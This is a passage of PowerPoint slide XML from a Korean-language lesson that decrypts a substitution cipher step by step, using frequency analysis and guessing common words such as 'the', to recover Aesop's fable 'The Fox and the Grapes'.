                </a:solidFill>
              </a:rPr>
              <a:t>Y</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t>PZAIXILGVSIZZMPGKKDWO MEPGROEIWGPCEIPAMDKKEYCIUYMGIFRWCEGLOPINYZHRZMPDN YWDWOGWITDWYSEDCEEIAFYYWMPIDWYAGTYPIKGLMXFPIWCEHR ZMMEYMEDWOMGQRYWCEUXMEDPZMQRGMEEYAPISDWOFICJILYS NICYZEYMGGJIPRWIWAIHRUNIWAHRZMUDZZYAMEYFRWCEMRPWD WOPGRWAIOIDWSDMEIGWYMSGMEPYYEYHRUNYARNFRMSDMEWG OPYIMYPZRCCYZZIOIDWIWAIOIDWEYMPDYAILMYPMEYMWUNMDW OUGPZYKFRMIMKIZMEIAMGODTYDMRNIWASIKJYAISIXSDMEEDZWG ZYDWMEYIDPZIXDWODIUZRPYMEYXIPYZGRPDMDZYIZXMGAYZNDZ YSEIMXGRCIWWGMOYM </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="그림 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F82B9528-A607-475B-8002-06260CAE85F4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7243767" y="4508739"/>
            <a:ext cx="4079379" cy="2197728"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="그림 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{424CE517-5F97-4DCF-8C32-57E4BF54066E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7243767" y="1840749"/>
            <a:ext cx="3735713" cy="2619146"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="TextBox 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A39759F7-5D70-4534-96ED-9D17D5B29604}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2705773" y="3884159"/>
            <a:ext cx="940494" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>암호문</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="화살표: 오른쪽 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D24EE5B-59A6-4A28-847E-99CA7D77E26A}"/>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extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3F7F6AD-E488-41E1-8EA8-D8112D56F2DE}"/>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257" y="4598969"/>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81258" y="4665535"/>
            <a:ext cx="4007178" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>MEeLGVIWAMEeOPINeZGWeEGMZRUUePZAIXILGVSIZZMPGKKDWO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ZMMEeMEDWOMGQReWCEUXMEDPZMQRGMEEeAPISDWOFICJILeS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>NICeZEeMGGJIPRWIWAIHRUNIWAHRZMUDZZeAMEeFRWCEMRPWD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OPeIMePZRCCeZZIOIDWIWAIOIDWEeMPDeAILMePMEeMWUNMDWO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>UGPZeKFRMIMKIZMEIAMGODTeDMRNIWASIKJeAISIXSDMEEDZWGZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>eDWMEeIDPZIXDWODIUZRPeMEeXIPeZGRPDMDZeIZXMGAeZNDZe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130376" y="6337135"/>
            <a:ext cx="4444775"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>Y-&gt;e</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="TextBox 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EBAA354-546D-4CC8-A633-7ADDE34A290A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8698381" y="2018138"/>
            <a:ext cx="1170149" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>빈도분석</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="7993307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2403"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62404" y="2092017"/>
            <a:ext cx="4007178" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>LGVIWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>MEDWOMGQReWCEUXMEDPZMQRGMEEeAPISDWOFICJILeS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>NICeZEeMGGJIPRWIWAIHRUNIWAHRZMUDZZeA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>MWUNMDWO</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>UGPZeKFRMIMKIZMEIAMGODTeDMRNIWASIKJeAISIXSDMEEDZWGZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>eDW</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>MEe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>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498022" y="3796722"/>
            <a:ext cx="3553906"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a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="화살표: 오른쪽 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DD39667-A9BF-4B6D-A4DF-CFB621BB8FDD}"/>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Picture 2" descr="양피지 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CF1EB7B7-E5DA-4210-8FC1-20CAA7668A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442"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18B237A-BDE3-4A84-9C0F-BB01562A6F77}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7083443" y="2092017"/>
            <a:ext cx="4007178" cy="1338828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>theLGVIWAtheOPINeZGWehGtZRUUePZAIXILGVSIZZtPGKKDWOthPG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>ROhIWGPChIPAtDKKheCIUetGIFRWChGLOPINeZHRZtPDNeWDWOG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WITDWeShDChhIAFeeWtPIDWeAGTePIKGLtXFPIWChHRZtthethDWOt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>GQReWChUXthDPZtQRGthheAPISDWOFICJILeSNICeZhetGGJIPRWI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WAIHRUNIWAHRZtUDZZeAtheFRWChtRPWDWOPGRWAIOIDWSDthIG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WetSG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thPee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>heHRUNeARNFRtSDthWGOPeItePZRCCeZZIOIDWIWAIOI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>DWhetPDeAILtePthetWUNtDWOUGPZeKFRtItKIZthIAtGODTeDtRNIWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>SIKJeAISIXSDthhDZWGZeDWtheIDPZIXDWODIUZRPetheXIPeZGRPDt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>DZeIZXtGAeZNDZeShItXGRCIWWGtOet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="TextBox 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{650ABE02-B583-442C-9FE2-55D96265BE39}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7319061" y="3796722"/>
            <a:ext cx="3553906" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>“The” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>점검</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: M-&gt;t, E-&gt;h </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="화살표: 오른쪽 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91CD18CC-72BA-42C0-9475-47F3DE8C59CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="5400000">
            <a:off x="8850891" y="4271705"/>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Picture 2" descr="양피지 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EE3CBA4-C06C-402C-AABA-B62CD6D236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7372" y="471739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3532C6F-BC3B-4C14-A945-41A654D26DC2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7087373" y="4783963"/>
            <a:ext cx="4007178" cy="1338828"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>theLGVIWAtheOrINeZGWehGtZRUUerZAIXILGVSIZZtrGKKDWOthrG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>ROhIWGrChIrAtDKKheCIUetGIFRWChGLOrINeZHRZtrDNeWDWOG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WITDWeShDChhIAFeeWtrIDWeAGTerIKGLtXFrIWChHRZtthethDWOt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>GQReWChUXthDrZtQRGthheArISDWOFICJILeSNICeZhetGGJIrRWI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WAIHRUNIWAHRZtUDZZeAtheFRWChtRrWDWOrGRWAIOIDWSDthIG</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>WetSGthreeheHRUNeARNFRtSDthWGOreIterZRCCeZZIOIDWIWAIOI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>DWhetrDeAILterthetWUNtDWOUGrZeKFRtItKIZthIAtGODTeDtRNIWA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>SIKJeAISIXSDthhDZWGZeDWtheIDrZIXDWODIUZRretheXIreZGRrDt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>DZeIZXtGAeZNDZeShItXGRCIWWGtOet</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="TextBox 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C8BD474-216F-4863-B008-EF9499B2944A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7319061" y="6460508"/>
            <a:ext cx="3553906" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>익숙한 단어 추측 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>: P -&gt; r</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="화살표: 오른쪽 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{670D9653-134A-4DB4-817A-9A3B5F65817A}"/>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1" name="Picture 2" descr="양피지 이미지 검색결과">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39C33161-371B-45A2-B122-7E009C183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5102" y="465083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F9B0E9D1-525D-4A17-BA85-34429CFDFE88}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1315103" y="4717397"/>
            <a:ext cx="4007178" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>thefoxandthegrapesonehotsummersdayafoxwasstrollingthroughanorc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>hardtilhecametoabunchofgrapesjustripeningonavinewhichhadbeentra</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> inedoveraloftybranchjustthetoquenchmythirstquothhedrawingbackafe </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>wpaceshetookarunandajumpandjustmissedthebunchturningroundaga</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>inwithonetwothreehejumpedupbutwithnogreatersuccessagainandagai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0"/>
              <a:t> nhetriedafterthetemptingmorselbutatlasthadtogiveitupandwalkedaway withhisnoseintheairsayingiamsuretheyaresouritiseasytodespisewhaty </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="900" dirty="0" err="1"/>
              <a:t>oucannotget</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="900" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="TextBox 32">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A33873BB-686C-47AC-8F07-C4F1D544D574}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="580444" y="6376735"/>
            <a:ext cx="5515557" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t> 해독 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>- 『</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>이솝우화</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" dirty="0"/>
              <a:t>』</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" dirty="0"/>
              <a:t>에 나오는 「여우와 포도」 이야기</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="25196138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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="2000" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1">
